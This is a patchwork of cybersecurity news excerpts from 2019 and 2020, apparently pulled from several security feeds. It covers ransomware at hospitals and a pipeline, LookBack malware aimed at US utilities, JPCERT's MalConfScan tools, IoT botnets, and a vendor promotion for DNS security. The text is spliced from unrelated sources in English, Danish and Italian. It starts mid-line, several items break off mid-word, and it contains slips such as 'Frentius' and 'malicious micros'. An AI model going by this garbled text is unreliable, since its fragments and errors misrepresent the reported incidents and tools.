Attachment – T1193 | [MITRE ATT&CK] Security Software Discovery – T1063 | [MITRE ATT&CK] System Network Configuration Discovery – T1016Tags: Naikon, APT, China, RAT, Aria-body, RoyalRoad, Malware

Europe’s Largest Private Hospital Operator Fresenius Hit by Ransomware

(published: May 6, 2020)

The private hospital operator Fresenius has been compromised by SNAKE Ransomware. Frentius is the largest European private healthcare provider and has been in high demand for its dialysis service and products used to combat the ongoing COVID-19 pandemic. The SNAKE ransomware is written in Golang and appeared in January 2020, it attempts to identify any processes linked to enterprise management tools and industrial control systems (ICS). This ransomware attack comes after a series of ransomware campaigns targeting health care providers who are attempting to resolve the pandemic.Recommendation: Ransomware can potentially be blocked by using endpoint protection solutions (HIDS), but as this news shows, new threats are constantly evolving to bypass these protections. Always keep your important files backed up. In the case of ransomware infection, the affected system must be wiped and reformatted. Other devices on the network should be checked for similar infections. Always check for a decryptor before considering payment; avoid payment at all costs. Ransomware should be reported to law enforcement agencies who are doing their best to track these actors and prevent ransom from being a profitable business for cyber criminals.MITRE ATT&CK: [MITRE ATT&CK] Data Encrypted for Impact – T1486Tags: Fresenius, SNAKE, Ransomware, COVID-19

Microsoft’s GitHub Account Hacked, Private Repositories Stolen

(published: May 6, 2020)

Threat actors claim to have gained full access to Microsoft’s private GitHub account, and have stolen over 500GB of data in private Microsoft projects. According to files released to Bleeping Computer by Shiny Hunters, the threat actors behind the breach, the event likely occurred March 28th, 2020, and Microsoft has stated that they are aware and investigating the claims behind the leak. Analysts at Bleeping Computer and cyber intelligence firm Under the Breach are of the opinion that the stolen data does not appear to contain sensitive code data for Windows or Office, and is mostly samples, test projects, and other generic items. Under the Breach did tweet concerns that private API keys or passwords could have inadvertently been left in the private repositories, as this has been done by developers in the past.Recommendation: It’s best practice for GitHub and other repository users to not commit personal config files into source control and to use password management tools and multi-factor authentication. While it is currently unknown how Shiny Hunters gained access into Microsoft’s private GitHub account, malicious actors are known to comb the Internet for config files with credentials listed in plain text to gain access to repositories. Avoid committing these files in the future and be sure to discuss best practices with team members.Tags: Microsoft, GitHub, Shiny Hunters

Warning: Citrix ShareFile Flaw Could Let Attackers Steal Corporate Secrets

(published: May 5, 2020)

Three critical vulnerabilities have been identified in Citrix ShareFile customer-managed storage zone controllers. Citrix ShareFile, a file sharing solution for businesses, allows employees to securely access and share proprietary and sensitive business data. According to Citrix, the vulnerabilities (CVE-2020-7473, CVE-2020-8982, CVE-2020-8983) if exploited, would allow an unauthenticated malicious actor access to ShareFile users’ documents and folders. According to Nate Warfield, a Senior Security Program Manager for the Microsoft Security Response Center, a search on Shodan revealed close to 2,800 exposed Citrix ShareFile storage servers. Citrix has released a mitigation tool and updates that include fixes for the three vulnerabilities, which affect ShareFile storage zone Controller 5.9.0, 5.8.0, 5.7.0, 5.5.0, and 5.5.0. Citrix warns that even updated storage zone controllers that were created using vulnerable versions are at risk, and must also run the mitigation tool on primary and secondary storage zone controllers.Recommendation: Threat actors are consistently looking for new ways to conduct malicious activity, therefore, it is crucial that your company has security and patch-maintenance policies in place. The security update should be applied as soon as possible to avoid potential exploitation. Citrix ShareFile customers that manage the zones themselves should ensure they are running a supported version and have run the mitigation tool (available at, requires login credentials) if necessary.Tags: CVE-2020-7473, CVE-2020-8982, CVE-2020-8983, Citrix, ShareFile

APT Groups Target Healthcare and Essential Services

(published: May 5, 2020)

The US Department of Homeland Security (DHS) and Cybersecurity and Infrastructure Security Agency (CISA) have issued an alert regarding Advanced Persistent Threat (APT) actors targeting COVID-19 response organizations. The targeted entities include: academia, healthcare, local governments, medical research, and pharmaceutical. The unnamed APT groups are using password spraying attacks, which are automated attacks using a list of passwords. The list of passwords could be a combination of previously compromised credentials or common passwords, among others.Recommendation: It is crucial that your company has password policies in place to avoid repetition across accounts, and mandate a level of password complexity that can resist brute force and password-spray attacks. Educate your employees of the dangers that these styles of attacks impose, and why mitigation must be in place prior to an incident taking place. Threat actors of all levels of sophistication are capable of utilizing brute-force and password-spraying attacks, therefore, it is paramount that all companies take steps to avoid these attacks.Tags: APT, COVID-19, Password spraying

Kaiji: New Chinese Linux Malware Turning to Golang

(published: May 4, 2020)

A new Internet of Things (IoT) botnet called, “Kaiji,” that targets IoT devices and servers with SSH brute-force attacks, according to Intezer researchers. The malware utilizes a custom implant, which was dubbed Kaiji by MalwareMustDie, instead of utilizing some publicly-available ones such as Mirai. Kaiji was built by threat actors in the Golang programming language, which has been increasingly utilized by threat actors. The malware only targets root users while conducting its only method of propagation through SSH brute force, and if Kaiji makes a connection it will launch a bash script to begin the installation process.Recommendation: Botnet malware typically takes advantage of internet-connected devices that have been misconfigured, or do not have security updates applied, however, as Kaiji shows there are Internet of Things (IoT) botnets that conduct brute-force attacks. Any device that connects to the internet must be treated as a security liability, and default usernames and passwords must be disabled. In addition, changing default port configurations can assist in preventing malware that scans for such configuration. Organizations and defenders should be aware of all their internet facing assets and have them under strict monitoring.Tags: Botnet, IoT, Kaiji, SSH brute force

Live Streaming Adult Site Leaves 7 Terabytes of Private Data Exposed

(published: May 4, 2020)

Researchers at SafetyDetectives have identified an exposed database used by the adult streaming website CAM4[.]com which has leaked over seven terabytes of data related to customers. CAM4 is a website used for livestreaming explicit material to adults and researchers were able to find an unsecured ElasticSearch database containing the personally identifiable information (PII) of the website’s customers. The data leaked includes firstname, surname, credit card data, email addresses and sexual orientation. U.S.A, Brazil and Italy were listed as the largest customer base for the platform with 10.88 billion records identified in the leak.Recommendation: Leaks of this sort may cause affected individuals to be at a greater risk of phishing attacks. Actors can use this information to craft custom emails to increase their chances of malicious activity being approved by the recipient. Individuals who have accounts associated with this incident should change their passwords as soon as possible, particularly if passwords for said accounts are the same to other online accounts. Individuals should also regularly monitor their credit reports for suspicious activity or consider an identity theft protection service.MITRE ATT&CK: [MITRE ATT&CK] Valid Accounts – T1078 | [MITRE ATT&CK] Exploit Public-Facing Application – T1190Tags: CAM4, Data leak, PII

Hackers Exploit Critical Flaw in Ghost Platform with Cryptojacking Attack

(published: May 4, 2020)

Threat actors over the weekend have been targeting the Ghost publishing platform in resource hijacking campaigns to mine cryptocurrency. Ghost is an open-source platform used for publishing and has over two million customers including Mozilla and DuckDuckGo. Threat actors were leveraging the vulnerabilities registered as “CVE-2020-11651” and “CVE-2020-11652”, which allow for remote code execution capabilities on servers in data centers and in the cloud. The exploit comes from Ghost’s usage of SaltStack, which provides the server management infrastructure of the platform.Recommendation: Cryptocurrency malwares are becoming increasingly common amongst threat actors. As this story portrays, it is important that your company institute policies regarding software in use and proper maintenance. New security updates should be applied as soon as possible because they often fix minor bugs and critical vulnerabilities that delay work-flow or can be exploited by malicious actors. Third-party software vendors must ensure that their software is secure frequently to avoid customers falling victim to cyber threats due to their own vulnerabilities.MITRE ATT&CK: [MITRE ATT&CK] Exploitation for Privilege Escalation – T1068 | [MITRE ATT&CK] Supply Chain Compromise – T1195 | [MITRE ATT&CK] Resource Hijacking – T1496Tags: Ghost, Resource Hijacking, Cryptocurrency mining, CVE-2020-11651, CVE-2020-11652

This section presents an overview of threats related to ransomware activity against municipal institutions, industrial enterprises and critical infrastructure facilities.


In the past month, 10 more hospitals have fallen victim to Ryuk attacks in the US

WildPressure APT targets industrial systems in the Middle East. ICS attack tools show increasing commodification. TrickMo works against secure banking. Microsoft warns of RCE vulnerability in the way Windows renders fonts. Click fraud malware found in childrens’ apps sold in Google Play. DarkHotel attacks the World Health Organization. Ransomware hits Parisian hospitals and a British biomedical research firm. More COVID-19 phishbait. Ben Yelin from UMD CHHS on Coronavirus detecting cameras, guest is Allan Liska from Recorded Future on security in the time of Coronavirus.

For links to all of today’s stories check our our CyberWire daily news brief:

Support our show

Here’s what’s changed in the NCSC’s guidance on mitigating malware and ransomware.

A US gas pipeline operator was infected by malware—your questions answered


Tuesday’s news that a ransomware infection shut down a US pipeline operator for two days has generated no shortage of questions, not to mention a near-endless stream of tweets.

Some observers and arm-chair incident responders consider the event to be extremely serious. That’s because the debilitating malware spread from the unnamed company’s IT network—where email, accounting and other business is conducted—to the company’s operational technology, or OT, network, which automatically monitors and controls critical operations carried out by physical equipment that can create catastrophic accidents when things go wrong.

Others said the reaction to the incident was overblown. They noted that, per the advisory issued on Tuesday, the threat actor never obtained the ability to control or manipulate operations, that the plant never lost control of its operations, and that facility engineers deliberately shut down operations in a controlled manner. This latter group also cited evidence that the infection of the plant’s industrial control systems, or ICS, network appeared to be unintentional on the part of the attackers.

Read 30 remaining paragraphs | Comments

index?i=HMk1rAE9v18:uW4u950oNyE:V_sGLiPB index?i=HMk1rAE9v18:uW4u950oNyE:F7zBnMyn index?d=qj6IDK7rITs index?d=yIl2AUoC8zA

Brazilians Targeted by Resurfaced CamuBot Malware (02/06/2020)The CamuBot malware has reemerged after a year-long hiatus to resume targeted attacks on the Brazilian financial industry. IBM X-Force researchers assessed CamuBot and found that it impersonates a security application that banks ask users to install and uses tactics similar to those in use by cybercriminal gangs. The attack begins when someone from the attacker’s side phones the victim and instructs him or her over the phone to browse to an infection page that hosts the CamuBot Trojan.EKANS Ransomware Discovered Targeting ICS Operations (02/04/2020)Multiple vendors have been analyzing an industrial control systems (ICS) ransomware that emerged in December and can halt various processes related to ICS operations. Dragos, MalwareHunterTeam, and SentinelOne have all assessed the EKANS (also called Snake) ransomware. In its research, Dragos connected EKANS to the MEGACORTEX ransomware and also determined that EKANS terminates the named processes on vic

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, read about Trend Micro Zero Day Initiative’s $1.5 million in awards and other noteworthy milestones in 2019. Also, learn about a crafty malware that makes you retype your passwords so it can steal them for credit card information and other personal data.

Read on:

Four Reasons Your Cloud Security is Keeping You Up at Night

Organizations are migrating to the cloud for speed, agility, scalability, and cost-efficiency – but they have realized that it demands equally powerful security management. As the cloud continues to attract more businesses, security teams are spending sleepless nights securing the infrastructure. We can reduce the number of security issues affecting cloud infrastructure; however, we must first conquer the possible reasons for security vulnerabilities.

Trend Micro and Baker Hughes Collaborate to Help Deliver Protection for Critical Infrastructure

Trend Micro announced this week that it will collaborate with Baker Hughes’ Nexus Controls operational technology (OT) security experts through a strategic framework agreement, signed in late 2019. Together the companies aim to provide comprehensive, industry leading guidance and support for enterprises running critical OT environments.

Malicious Optimizer and Utility Android Apps on Google Play Communicate with Trojans that Install Malware, Perform Mobile Ad Fraud

Trend Micro recently discovered several malicious optimizer, booster and utility apps (detected as AndroidOS_BadBooster.HRX) on Google Play. The apps can access remote ad configuration servers that can be used for malicious purposes, perform mobile ad fraud, and download as many as 3,000 malware variants or malicious payloads on affected devices.

Zero Day Initiative Bug Hunters Rake in $1.5M in 2019

Zero Day Initiative, a division of Trend Micro, awarded more than $1.5 million in cash and prizes to bug-hunters throughout 2019, resulting in 1,035 security vulnerability advisories for the year. Most of those advisories (88 percent) were published in conjunction with a patch from the vendor.

ICS in VUCA: Insights from the World‘s Biggest ICS Security Event – S4

Many sessions at this year’s S4 discussed strengthening leadership. The environment surrounding the ICS community is filled with volatility, uncertainty, complexity and ambiguity (VUCA), and it requires strong leadership to drive changes. In this blog, read about the key takeaways coming out of the world’s leading ICS security event, S4.

This Crafty Malware Makes You Retype Your Passwords So It Can Steal Them

A trojan malware campaign is targeting online banking users around the world with the aim of stealing credit card information, finances and other personal details. Detailed by researchers at Fortinet, the Metamorfo banking trojan has targeted users of over 20 online banks in countries around the world including the US, Canada, Peru, Chile, Spain, Brazil, Ecuador and Mexico.

SORA and UNSTABLE: 2 Mirai Variants Target Video Surveillance Storage Systems

Trend Micro researchers encountered two variants of the notorious internet of things (IoT) malware, Mirai, employing a new propagation method. The two variants, namely SORA (detected as IoT.Linux.MIRAI.DLEU) and UNSTABLE (detected as IoT.Linux.MIRAI.DLEV), gain entry through Rasilient PixelStor5000 video surveillance storage systems by exploiting CVE-2020-6756.

Vulnerability in WhatsApp Desktop Exposed User Files

Facebook has patched a vulnerability in WhatsApp Desktop that could allow an attacker to launch cross-site scripting (XSS) attacks and access files from the victim’s system when paired with WhatsApp for iPhone. The vulnerability was discovered by PerimeterX security researcher Gal Weizman, who found he could bypass WhatsApp’s CSP to execute code on a target system using maliciously crafted messages.

Ryuk Ransomware Infects US Government Contractor

The internal system of U.S. government contractor Electronic Warfare Associates (EWA) was infected with Ryuk ransomware last week, ZDNet reported. EWA is a contractor that supplies electronic equipment and services to the Department of Defense (DOD), the Department of Homeland Security (DHS), and the Department of Justice (DOJ).

New Lemon Duck Malware Campaign Targets IoT, Large Manufacturers

Printers, smart TVs and automated guided vehicles that depend on Windows 7 have become the latest targets for cybercriminals leveraging a “self-spreading” variant of the malware Lemon Duck. In a report released Wednesday by TrapX Security, researchers warn manufacturers dependent on IoT devices are targets in a new global campaign leveraging the malware variant.

New Extortion Campaign Threatens Victims of the 2015 Ashley Madison Breach

A new extortion campaign is targeting victims of the Ashley Madison data breach that happened five years ago, Vade Secure reports. Avid Life Media — the company behind the site — was hacked in 2015 by a group known as Impact Team. The actors behind this new campaign tell victims that they will publicize proof of their profile as well as other “embarrassing” activities and demand bitcoins as payment. 

Emotet Uses Coronavirus Scare in Latest Campaign, Targets Japan

Threat actors behind the Emotet malware used the novel coronavirus (2019-nCoV) scare as a hook for their spam email campaign against targets in Japan. IBM X-Force reported that the coronavirus spam emails were disguised as official notifications sent by a disability welfare provider and public health centers. The email content warns recipients about the rapid spread of the virus and instructs them to download an attached notice that allegedly contains preventive measures.

Researchers Use Smart Light Bulbs to Infiltrate Networks

Researchers successfully infiltrated networks through a vulnerability in Philips Hue light bulbs. The CVE-2020-6007 vulnerability, which involves the Zigbee communication protocol, can be abused to remotely install malicious firmware in smart light bulbs and spread malware to other internet-of-things (IoT) devices.

What was your biggest takeaway from the S4 ICS security conference this year? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: ZDI Bug Hunters Rake in $1.5M in 2019 and Metamorfo Trojan Malware Campaign Targets Online Banking Users appeared first on .

Researchers simulated a real-looking “Industrial prototyping” organization with fake employees, PLCs, and websites to study the types of cyber-attacks that commonly on such networks. The elaborately fake organization’s website and the network worked on a highly advanced interactive “honeypot” network that worked extensively on attracting the attention of potential hackers.The plan was to create such a legitimate-looking network that no one could even doubt it’s being phony and to accumulate serious information related to cyber-threats and attacks to study and analyze them. Behind researching these threats and attack mechanisms the motive was to dig out the threats that the “Industrial control system” (ICS) sector faces today. Per sources, the sham company specifically let some ports of its network be susceptible to attack and Voila! It got hit with the most cliché of attacks that any IT network faces, including, Ransomware, Malware, Remote Access Trojans (RAT), Crypto-jacking, Online fraud and the “botnet-sty

AWS and Google Cloud are back up after early week unrelated outages. A German automation tool manufacturer discloses a ransomware infestation. Mobile malware in the spies’ toolkit. The FBI’s Protected Voices share election secuirty informaiton. Notes from SecurityWeek’s 2019 ICS Cyber Security Conference. NCSC’s annual report. And people have things to say about backdoors, bribes, and those aliens at Area 51. (Chemtrails, too.) Craig Williams from Cisco Talos with an update on Emotet. Guest is Dave Weinstein from Claroty discussing threats to critical infrastructure.

For links to all of today’s stories check our our CyberWire daily news brief: 

Support our show

Phishers are impersonating engineering license boards to target U.S. utility organizations with LookBack malware.

Between July 19–25, Proofpoint discovered the LookBack campaign when it came across some spear phishing emails purporting to be from the National Council of Examiners for Engineering and Surveying (NCEES). Each of these emails abused the NCEES logo, spoofed the sender address and reply-to fields, and included both member ID numbers and the signature block of a nonexistent NCEES employee.

Supported by these falsified details, the emails used the pretense of a failed examination to trick employees at U.S. utility organizations into opening a Microsoft Word document named Result Notice.doc. This document leveraged VBA macros to install LookBack malware.

Written in C++, the sample of LookBack analyzed by Proofpoint used a proxy communication tool to send data from the infected host to its command-and-control (C&C) server. This malware enabled digital attackers to delete files, execute commands, take screenshots and assume control of the device’s cursor. It also enabled threat actors to view system, process and file data, a capability they could have used to conduct reconnaissance of a targeted utility.

The Rise of ICS Threats

LookBack comes amid a steady rise of threats targeting organizations’ industrial control systems (ICSs). In October 2018, for instance, the critical water utility ONWASA suffered a ransomware attack that limited the functionality of its computer systems. Just a few months later, WIRED reported that researchers had observed a threat actor called XENOTIME probing the networks of at least 20 U.S. electric system targets. This arrived shortly before FireEye unearthed a phishing campaign that targeted organizations in the energy and utilities, government, and oil and gas sectors.

How to Defend Against LookBack Malware

Organizations can strengthen their defenses against malware like LookBack by integrating phishing intelligence with their security information and event management (SIEM) systems to visualize the entire hierarchy of an attack. Companies should also take a layered approach to email security by embracing SIEM, mail scanning tools, perimeter protection solutions and other utilities.

The post Phishers Impersonate Engineering License Boards to Target Utilities With LookBack Malware appeared first on Security Intelligence.

On August 1, security researchers at Proofpoint reported the details of a spearphishing campaign targeting three different United States utility companies using a malware called “LookBack.” The spearphishing emails, sent between July 19 and July 25, contained a malicious Microsoft Word attachment that installed a Remote Access Trojan (RAT) capable of performing activities like deleting files, taking screenshots, rebooting machines, and then deleting itself from an infected network.

While Prooftpoint was able to confirm the presence of LookBack malware at three companies, it is likely that the malware has infected other organizations as well. The emails used in the spearphishing campaign falsely appeared to be from the National Council of Examiners for Engineering and Surveying (NCEES), an American nonprofit organization that handles professional licensing for engineers and surveyors. Even fraudulently using the NCEES logo, the emails included Word documents embedded with malicious micros that, once opened, installed and ran the never-before-seen RAT.

Researchers told Threatpost that the emails were blocked before they could infect the unnamed utility companies.

How LookBack Works

According to the report by Proofpoint, LookBack is a RAT that relies on a proxy communication tool to relay data from the infected host to a command-and-control server (C2). The malware can view process, system and file data; delete files; take screenshots; move and click the infected system’s mouse; reboot machines; and delete itself from an infected host.

Researchers said that the LookBack spearphishing campaign used tactics once used by known APT adversaries targeting Japanese corporations in 2018 – which highlights the rapidly evolving nature of malware and its use by nation-state actors.

The Microsoft Word document attached to the phishing emails contains a VBA macro that drops three different Privacy Enhanced Mail (PEM) files when executed. Certutil.exe is then dropped to decode PEM files, which are later restored to their true extensions using essentuti.exe. The files then impersonate the name of an open-source binary used by common tools like Notepad++, which contains the C2 configuration. Finally, the macro runs GUP.exe and libcurl.dll to execute the LookBack malware. Once executed, LookBack can send and receive numerous commands, such as Find files, Read files, Delete files, Write to files, Start services, and more.

Has Your Organization Been Exposed to LookBack? Here’s How to Detect It.

Due to the nature of the threat, it’s important to have multiple controls in place to detect the activities related. This includes continuous security awareness training for employees and personnel to help them better identify fake and malicious emails. But beyond SPAM filters and firewalls, Nozomi Networks Labs recommends the use of both anomaly detection technologies to identify unusual behavior, and the use of traditional threat detection capabilities to provide additional context around suspicious actors related to known threats.

Within 24 hours of the announcement of this attack, the Nozomi Networks Labs team added new rules and signatures to the OT ThreatFeed to help detect LookBack in your environment. This means that alerts will now be triggered for suspicious activity related to the known threat, LookBack, so that you can detect and remediate quickly. For customers using OT ThreatFeed, please make sure that your systems are running the latest version (from August 2, 2019) to enable these new rules.

With cyberthreats against utilities continuing to rise, LookBack is just another reminder that there’s still much work to be done as utility companies continue to strengthen their cyber security.

How to Detect LookBack Malware

Tuesday, August 16th, 2019
9:00 AM PDT


Related Links

Proofpoint Blog: LookBack Malware Targets the United States Utilities Sector with Phishing Attacks
SecurityWeek Article: New LookBack Malware Used in Attacks Against U.S. Utilities Sector
Threatpost Article: Nation-State APTs Target U.S. Utilities With Dangerous Malware
Blog: IEC 62351 Standards for Securing Power System Communications
Blog: Advancing IEC Standards for Power Grid Cyber Security
Webpage: Real-time Visibility and Cyber Security for Electric Utilities
Webpage: Mitigating ICS Cyber Incidents
Webpage: Nozomi Network Labs
Webpage: OT ThreatFeed

The post What You Need to Know About LookBack Malware & How to Detect It appeared first on Nozomi Networks.

In malware analysis, extracting the configuration is an important step. Malware configuration contains various types of information which provides a lot of clues in incident handling, for example communication details with other hosts and techniques to perpetuates itself. This time, we will introduce a plugin “MalConfScan with Cuckoo” that automatically extracts malware configuration using MalConfScan (See the previous article) and Cuckoo Sandbox (hereafter “Cuckoo”).
This plugin is available on GitHub. Feel free to download from the webpage below:

   JPCERTCC/MalConfScan – GitHub

About MalConfScan with Cuckoo

“MalConfScan with Cuckoo” is a plugin for Cuckoo, which is an open source sandbox system for dynamic malware analysis. By adding this plugin to Cuckoo, MalConfScan runs on Cuckoo, enabling automatic extraction of malware configuration . Figure 1 shows Cuckoo’s behaviour where “MalConfScan with Cuckoo” is installed.

Figure 1:Behaviour of MalConfScan with CuckooFigure 1:Behaviour of “MalConfScan with Cuckoo”

“MalConfScan with Cuckoo” runs malware on the host machine to extract configuration. When malware is registered on Cuckoo and executed on the host machine, a memory image will be dumped, from which MalConfScan extracts configuration of known malware. Extracted configuration will then be shown in a report. Please see the previous article or the following page for the list of malware that this tool supports.

   JPCERTCC/MalConfScan – GitHub

Instruction and report example

First, upload malware on Cuckoo that has “MalConfScan with Cuckoo” installed by using Web GUI or commands. An official document from Cuckoo [1] provides details about the upload procedures. When the upload and analysis is completed, a report will be provided as in Figure 2.

Figure 2:Report of MalConfScan with CuckooFigure 2:Report of “MalConfScan with Cuckoo”

Figure 2 shows the configuration of malware Himawari, a variant of RedLeaves which is used in targeted attacks. It is a kind of bot, and the configuration contains C&C server, destination port, protocol, encryption key etc. In this way, “MalConfScan with Cuckoo” can easily extract configuration for known malware.
Additionally, the results can also be obtained in JSON format. report.json records the following data:

“malconfscan”: {
“data”: [
“malconf”: [
{“Server1”: “”},
{“Server2”: “”},
{“Server3”: “”},
{“Server4”: “”},
{“Port”: “443”},
{“Mode”: “TCP and HTTP”},
{“ID”: “2017-11-28-MACRO”},
{“Mutex”: “Q34894iq”},
{“Key”: “usotsuki”},
{“UserAgent”: “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)”},
{“Proxy server”: “”},
{“Proxy username”: “”},
{“Proxy password”: “”}
] ],
“vad_base_addr”: “0x04521984”,
“process_name”: “iexplore.exe”,
“process_id”: “2248”,
“malware_name”: “Himawari”,
“size”: “0x00815104”

How to install

The following steps are required before installing “MalConfScan with Cuckoo”:

Install MalConfScan
Apply patches for Cuckoo
Change configuration of Cuckoo

For more information about how to install the tool, please see our wiki on the GitHub:

   MalConfScan-with-Cuckoo Wiki – GitHub

Ubuntu 18.04
Python 2.7.16
Cuckoo 2.0.6
Volatility 2.6

A blog article by @soji256 explains procedures to install “MalConfScan with Cuckoo”, which can be a good reference.

   Installing the MalConfScan with Cuckoo to Analyze Emotet – Medium

In closing

This plugin enables extracting configuration of known malware from sandbox. Even in case where malware has anti-VM or anti-sandbox function, we can still extract the configuration by spoofing some environmental information.
We will present the details of “MalConfScan” and “MalConfScan with Cuckoo” at the coming Black Hat USA 2019 Arsenal [3]. Feel free to stop by if you are attending Blackhat USA 2019, and we look forward to having active discussion and feedback from analysts.

Tomoaki Tani(Translated by Yukako Uchida)

[1] Cuckoo Docs – Submit an Analysis

[2] “Abnormal Encryption of Himawari” – Japan Security Analyst Conference [Japanese]

[3] MalConfScan with Cuckoo: Automatic Malware Configuration Data Extraction and Memory Forensic – Black Hat USA 2019

Every day, new types of malware are discovered. However, many of them are actually variants of existing malware – they share most part of the code and there is a slight difference in configuration such as C&C servers. This indicates that malware analysis is almost complete as long as the configuration is extracted from malware.
In this article, we would like to introduce details of “MalConfScan”, a tool to extract malware configuration, developed by JPCERT/CC. This tool is available on GitHub. Feel free to download from the webpage below:

JPCERTCC/MalConfScan – GitHub

Read the Wiki to learn how to install the tool:
MalConfScan wiki – GitHub

About MalConfScan

MalConfScan is a plugin for The Volatility Framework (hereafter “Volatility”), a memory forensic tool. In most cases, malware analysis begins with unpacking the malware to extract configuration. MalConfScan extracts configuration from unpacked executable files loaded on the memory.
MalConfScan can perform the following functions:

malconfscan: Extract configuration of known malware from a memory image
malstrscan: Detect suspicious processes from a memory image and list the string that it refers to

Figure 1 is an example of malconfscan execution. First, a malware-injected process name (Name), the process ID (PID) and the name of the detected malware (Malware Name) are displayed. Malware configuration (Config info) is also displayed.

malconfscan execution result 1Figure 1:malconfscan execution result (Detected “Lavender”, a RedLeaves variant)

malconfscan also decodes encoded strings and displays DGA domains. Figure 2 is the result where malconfscan detected Bebloh. DGA domains are listed following the configuration.

malconfscan execution result 2Figure 2:malconfscan execution result (Detected Bebloh)

As of 30 July 2019, malconfscan is compatible with 25 types of malware. See Appendix for supported malware.


malstrscan detects Process Hollowing on the memory and lists the strings that the process refers to. Although malware configuration is usually encoded, malware decodes it when referring to the information, and this is sometimes left on the memory. This function can pick up such remaining configuration. Figure 3 is an example of malstrscan execution.

malstrscan execution resultsFigure 3:malstrscan execution results

malstrscan lists strings only from the memory space where the PE file is loaded. With ‘-a’ option, it can also list strings in heap and parent memory space.

In closing

malconfscan can be used for malware analysis and memory forensics. We hope that this tool helps incident investigation. We plan to update this tool in the future to make it compatible with many other types of malware.
In the next article, we will install this tool in Cuckoo Sandbox to automatically extract malware configuration.

Shusei Tomonaga
(Translated by Yukako Uchida)

Appendix A Malware Compatible with MalConfScan

Table 1: Compatible malware
HawkEye Keylogger
Smoke Loader
Poison Ivy
NanoCore RAT

Listen over de identificerede malware-varianter i juni måned viser en tilbagevenden af WannaCry- og Tinba-aktiviteter.

Tendensen er stadig at de ti varianter, der identificeres oftest, står for mere end 60 procent af de samlede malware-identifikationer.

Fordelingen over de hyppigst optrædende malware-navne ser således ud for juni 2019:


Keywords: malwareLæs mere om Top-10 over malware i juni

I ricercatori di sicurezza del team Unit 42 di Palo Alto Networks hanno scoperto il malware per macOS CookieMiner, progettato per “rubare” i cookie associati a siti Web per lo scambio di criptovalute.

There are two types of companies: Those who have been hacked, and those who don’t yet know they have been hacked1

With data breaches frequently making the news and causing panic among network administrators, the above statement by former Cisco boss John Chambers in 2015 certainly doesn’t seem far-fetched. I don’t remember a week in 2018 going by where I wasn’t learning of a data breach and how sophisticated the attack was. Well, except for the time I didn’t have internet access while visiting the Salt Cathedral of Zipaquirá, and I couldn’t understand why. Then, there was the time I had no access on a cruise, but I digress.

The consequences of a data breach are far reaching and include the tangible and intangible. It should come as no surprise that information security is the top concern for CISOs and CIOs of companies. Some of these companies are embracing cloud-native initiatives that have improved organizational agility, reduced products’ time-to-market, and leveled the playing field with respect to computational power. However, they lose visibility into the expanded environment, causing concerns over whether they can adequately secure their cloud environment the way they would their traditional network.

These well-founded concerns are understandable. Traditional network security solutions being used in combating the current cyber-crimewave have only increased the complexity and risk for businesses. Fraudsters have amped up their phishing techniques to deploy sophisticated malware on network devices(human controlled and otherwise) as part of ransomware campaigns, steal sensitive data, or other criminal activities.

It’s far more important to keep an eye on what’s traveling out of the network….Today, malicious actors aren’t interested in scaling the castle wall and capturing the flag. They want to exfiltrate the flag.2

We should always remind ourselves of the statement above made by John Kindervag and add to our focus, ways to prevent any data exfiltration to unauthorized sources in our network. Companies have typically leveraged endpoint solutions in addition to other network elements to protect against malware used for that purpose. However, in combating the cyber-criminals of today, companies need to embrace a defense-in-depth security strategy where all network layers used in accessing data should be secure and this includes the DNS layer. DNS is an often overlooked layer for security and yet, is integral to network functionality. It’s the protocol we use to locate resources on a network. We use it to access our favorite websites, whether news or social media. We use it to access the printers or storage devices, when accessing the security cameras in the data centers and even to send emails. It’s also used by unsuspecting victims to access phishing websites from where malware is downloaded. It is also used by malware to locate control servers on internet. These servers could serve as destinations of data stolen (also using DNS protocol) from digital assets inside companies. These servers could also be used to download keys used to encrypt digital assets as part of ransomware activities.

And so, it’s wise and imperative to secure the DNS layer as part of a defense-in-depth security strategy. As a security control point, DNS layer security offers a proactive way to uniformly and immediately block malicious domains and communications for all of your users, whether they are on or off network. It can also deliver lower latency, fewer broken sites and apps, and improved network performance.


These are drivers for the Akamai Enterprise Threat Protector (ETP) solution. ETP is a Secure Internet Gateway solution that is really about advanced threat protection in the cloud for all your users everywhere and using that as your safe onramp to the internet. ETP uses multiple layers of protection — DNS, URL, and inline payload analysis — to provide security with reduced complexity and without impacting performance. Companies simply need to direct their recursive DNS traffic to Enterprise Threat Protector global servers where all requested domains are checked against Akamai’s real-time domain risk scoring threat intelligence. Safe domains are resolved as normal, malicious domains are blocked, and risky domains are sent to a smart selective proxy where the HTTP or HTTPS URLs are inspected to determine if they are malicious. The HTTP and HTTPS payloads from risky domains are then scanned in real-time using multiple advanced malware-detection engines.

ETP improves security defenses. It reduces security complexity and increases the efficiency of security teams. Find out more here.